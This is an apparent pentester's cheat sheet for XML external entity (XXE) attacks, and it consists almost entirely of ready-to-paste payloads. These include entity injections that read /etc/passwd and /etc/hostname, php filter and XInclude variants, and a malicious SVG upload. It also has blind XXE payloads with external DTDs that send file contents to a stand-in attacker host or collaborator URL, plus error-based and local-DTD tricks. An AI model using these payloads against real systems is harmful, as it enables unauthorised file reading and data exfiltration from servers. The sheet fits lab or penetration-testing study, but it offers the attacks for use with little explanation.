XXE Attacks
PRACTICE ! PRACTICE ! PRACTICE !
Found any request handling any kind of XML document, don't hesitate to inject :
<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Don't forget to change the respective element to &xxe;
PHP Wrappers :
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
Don't forget to change the respective element to &xxe;
Try to get an out-of-band network connection :
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR"> ]>
Not allowed to define an Entity or Doctype then :
<d0p xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></d0p>
XXE via File Upload :
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY [xxe](https://portswigger.net/web-security/xxe) SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
Name the file with a .svg
and modify the Content-Type to image/svg+xml
or text/xml
Blind XXE
Blind XXE to detect out-of-band network interaction
<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER'S IP"> %xxe; ]>
Exploiting Blind XXE
In-order to perform this, we'll have to have an exploit server containing our malicious dtd
XML document
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://BURP-COLLAB/exploit.dtd'>">
%eval;
%exfil;
And now we can copy down our exploit server's URL and use it in our usual payload, keep an eye on the in-band request containing the hostname
, Always use /etc/hostname
instead of /etc/passwd
.
<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM "https://THE-MALICIOUS-DTD-URL/exploit.dtd"> %xxe; ]>
Blind XXE to retrieve data by triggering errors
Store this XML payload in the exploit server
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
Now the usual way to get a network interaction
<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://YOUR-EXPLOIT-DTD"> %xxe;]>
Blind XXE by defining local DTD
Use this payload, when your target is a Linux Sys
<!DOCTYPE stockCheck [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
Last updated